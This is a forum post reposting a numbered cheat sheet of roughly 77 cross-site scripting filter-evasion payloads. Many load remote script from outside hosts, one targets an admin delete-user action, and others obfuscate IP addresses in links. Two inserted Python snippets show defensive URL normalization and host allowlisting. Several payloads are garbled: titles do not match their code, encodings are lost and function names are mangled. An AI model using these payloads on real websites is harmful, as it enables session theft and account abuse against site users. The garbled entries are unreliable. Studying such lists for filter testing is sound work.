It seems t00ls has fairly little material on XSS, so when I saw something good I copied it over; not sure whether any of you need to bookmark it.
(1) Plain XSS JavaScript injection:
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multiline injected JavaScript; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters have basically no effect domestically, because there is nowhere to use them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
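A defender's view of items (3) to (19), added here as an illustration and not part of the copied cheat sheet: a literal "javascript:" prefix test is placed beside a check that first normalizes the attribute value the way a browser does (decoding character references with or without semicolons, dropping NUL/tab/CR/LF, ignoring case). All sample values are constructed.

```python
import html
import re

# Added example, not from the cheat sheet: normalizing check for javascript: URLs.
# Browsers skip C0 control characters and spaces while reading a URL
# scheme, so NUL, tab, LF and CR (items 11-14, 17, 19) are dropped here.
_IGNORED = re.compile(r"[\x00-\x20]")
SCRIPT_SCHEMES = ("javascript", "vbscript")   # execute script in SRC/HREF


def naive_filter(value: str) -> bool:
    """The weak check: a literal lowercase 'javascript:' prefix only."""
    return value.startswith("javascript:")


def normalize_url_attr(value: str) -> str:
    """Decode character references (items 5, 8-10: decimal or hex, with
    or without ';'), drop ignored characters, then lowercase (item 4)."""
    decoded = html.unescape(value)           # &#106; &#0000106 &#x6A ...
    return _IGNORED.sub("", decoded).lower()


def url_scheme(value: str) -> str:
    """Scheme of the normalized value, or '' when it has none."""
    m = re.match(r"([a-z][a-z0-9+.-]*):", normalize_url_attr(value))
    return m.group(1) if m else ""


def is_script_url(value: str) -> bool:
    """True when a browser would execute the attribute value as script."""
    return url_scheme(value) in SCRIPT_SCHEMES


# Constructed samples modelled on the variants listed above.
SAMPLES = [
    "JaVaScRiPt:alert('XSS')",                    # item 4, mixed case
    "&#106;&#97;&#118;&#97;script:alert('XSS')",  # item 5, entities
    "&#0000106&#0000097vascript:alert('XSS')",    # item 9, no semicolons
    "jav\tascript:alert('XSS')",                  # item 11, embedded tab
    "jav&#x0A;ascript:alert('XSS')",              # item 12, encoded newline
    "java\0script:alert('XSS')",                  # item 17, null byte
    " javascript:alert('XSS')",                   # item 19, leading space
    "http://example.com/a.png",                   # benign, must pass
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"naive={naive_filter(s)!s:5} normalized={is_script_url(s)!s:5} {s!r}")
```

Every script sample above fails the naive test and is caught by the normalized one, while the benign image URL passes both.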

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous tag with STYLE (made up of an open angle bracket and a leading letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE variant
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash movie that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash to smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);

(57) XML namespace. The HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can embed JS code inside an image
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT ="">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP address as a decimal integer
<A HREF="http://3232235521">XSS</A>

(71) IP address in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP address in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/"">XSS</A>

(74) Dropping [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Dropping [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
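As an added illustration (not part of the copied cheat sheet), a Python allowlist check for the host spellings in items (70) to (77): numeric hosts are reduced to a dotted quad under the classic inet_aton rules, tab/newline characters and the scheme-relative and trailing-dot forms are normalized, and only then is the host compared. The allowlist and sample URLs are constructed.

```python
import re
from urllib.parse import urlsplit

# Added example, not part of the cheat sheet: canonicalize a link's host so the
# decimal, hex, octal, mixed, scheme-relative and trailing-dot spellings above
# (items 70-76) all compare equal to the host they actually resolve to.


def _legacy_part(part: str) -> int:
    """One dotted component under classic inet_aton rules: '0x' prefix is
    hex, a leading zero is octal, anything else decimal."""
    if part[:2].lower() == "0x":
        return int(part[2:] or "0", 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def canonical_ipv4(host: str):
    """Dotted quad for a numeric host, else None. Fewer than four parts are
    legal: the last part fills the remaining bytes (so '3232235521' works)."""
    try:
        nums = [_legacy_part(p) for p in host.split(".")]
    except ValueError:
        return None                       # a DNS name, or junk
    tail = 5 - len(nums)                  # bytes covered by the last part
    if not 1 <= len(nums) <= 4 or any(not 0 <= n <= 255 for n in nums[:-1]) \
            or not 0 <= nums[-1] < 256 ** tail:
        return None
    value = nums[-1]
    for shift, n in enumerate(reversed(nums[:-1])):
        value |= n << (8 * (tail + shift))
    return ".".join(str((value >> s) & 255) for s in (24, 16, 8, 0))


def canonical_host(url: str) -> str:
    """Host a browser would contact, in comparable form: tab/CR/LF dropped
    (item 73), '//' given a scheme (74), numeric hosts as a dotted quad,
    DNS names lowercased without the trailing dot (76)."""
    url = re.sub(r"[\t\r\n]", "", url)
    if url.startswith("//"):
        url = "http:" + url
    host = urlsplit(url).hostname or ""   # '' for javascript: links (77)
    return canonical_ipv4(host) or host.rstrip(".")


def host_allowed(url: str, allowlist) -> bool:
    """Allowlist check that is not fooled by the spellings above."""
    return canonical_host(url) in allowlist
```

With an allowlist of {"www.google.com", "192.168.0.1"}, every variant in items (70) to (76) is recognized as its real host, and the javascript: link in (77) yields an empty host and is rejected.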